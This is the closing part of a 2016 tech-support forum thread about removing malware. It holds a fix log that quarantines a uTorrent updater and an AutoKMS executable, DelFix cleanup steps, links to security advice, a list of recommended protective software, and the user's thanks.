C:\Users\Kym\AppData\Roaming\uTorrent\updates\3.4.1_30925.exe
C:\WINDOWS\AutoKMS\AutoKMS.exe
EmptyTemp:
End
*****************
Restore point was successfully created.
Processes closed successfully.
C:\Users\Kym\AppData\Roaming\uTorrent\updates\3.4.1_30925.exe => moved successfully
C:\WINDOWS\AutoKMS\AutoKMS.exe => moved successfully
EmptyTemp: => 360 MB temporary data Removed.
The system needed a reboot.
==== End of Fixlog 14:21:51 ====
DelFix
Please download DelFix (http://general-changelog-team.fr/en/downloads/finish/20-outils-de-xplode/9-delfix) or from Here (http://www.bleepingcomputer.com/download/delfix/) and save the file to your Desktop.
Double-click DelFix.exe to run the programme.
Place a checkmark next to the following items:
Remove disinfection tools
Click the Run button.
-- This will remove the specialised tools we used to disinfect your system. Any leftover logs, files, folders or tools remaining on your Desktop which were not removed can be deleted manually (right-click the file + delete).
~~~~~~~~~~~~~~~~~~~~`
Answers to common security questions - Best Practices (http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/) by quietman7, MVP
How Malware Spreads - How did I get infected? (http://www.bleepingcomputer.com/forums/t/287710/how-malware-spreads-how-did-i-get-infected/) by quietman7, MVP
Simple and easy ways to keep your computer safe and secure on the Internet (http://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/) by Lawrence Abrams, MVP
How to Prevent Malware (http://users.telenet.be/bluepatchy/miekiemoes/prevention.html) by miekiemoes, MVP
How to backup and restore your data using Cobian Backup (http://www.bleepingcomputer.com/tutorials/backup-and-restore-data-with-cobian-backup/) by YourHighness
Slow Computer/browser? It May Not Be Malware (http://www.bleepingcomputer.com/forums/t/87058/slow-computerbrowser-check-here-first;-it-may-not-be-malware/) by quietman7, MVP
The following programmes come highly recommended in the security community.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xKsUqI5A.png.pagespeed.ic.vn1Hlvqi8h.jpgAdBlock (https://adblockplus.org/en/firefox) is a browser add-on that blocks annoying banners, pop-ups and video ads.
http://i.imgur.com/E8I37RF.pngCryptoPrevent (https://www.foolishit.com/) places policy restrictions on loading points for ransomware (eg.CryptoPrevent), preventing your files from being encrypted.
http://i.imgur.com/EG85Vjt.png Malwarebytes Anti-Exploit (https://www.malwarebytes.org/antiexploit/) (MBAE) is designed to prevent zero-day malware from exploiting vulnerable software.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/x6YRrgUC.png.pagespeed.ic.HjgFxjvw2Z.jpgMalwarebytes Anti-Malware Premium (https://www.malwarebytes.org/) (MBAM) works in real-time along side your Anti-Virus to prevent malware execution.
http://1-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xjv4nhMJ.png.pagespeed.ic.A5YbWn1eDO.png NoScript (http://noscript.net/) is a Firefox add-on that blocks the actions of malicious scripts by using whitelisting and other technology.
http://i.imgur.com/3O8r9Uq.png (http://www.sandboxie.com/) Sandboxie (http://www.sandboxie.com/) isolates programmes of your choice, preventing files from being written to your HDD unless approved by you.
http://1-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/DgW1XL2.png.pagespeed.ce.v1OlJl_ZAS.png Secuina PSI (http://secunia.com/vulnerability_scanning/personal/) will scan your computer for vulnerable software that is outdated, and automatically find the latest update for you.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xj1OLIec.png.pagespeed.ic.k6hhwopU0q.jpg SpywareBlaster (https://www.brightfort.com/spywareblaster.html) is a form of passive protection, designed to block the actions of malicious websites and tracking cookies.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xJEP5iWI.png.pagespeed.ic.4tmM1lM7DQ.pngWeb of Trust (https://www.mywot.com/) (WOT) is a browser add-on designed to alert you before interacting with a potentially malicious website.
Want to help others? Join the ClassRoom (http://forums.whatthetech.com/What_the_Tech_Classroom_t80368.html) and learn how.
kym.preston
2016-03-03, 12:28
Once again, thank you so much! I really do appreciate the time and effort you put into helping a complete stranger.
We're glad to help, safe surfing :)http://i204.photobucket.com/albums/bb106/Juliet702/sparkle.gif
Glad we could help. :)http://i204.photobucket.com/albums/bb106/Juliet702/sparkle.gif
Since this issue appears resolved ... this Topic is closed.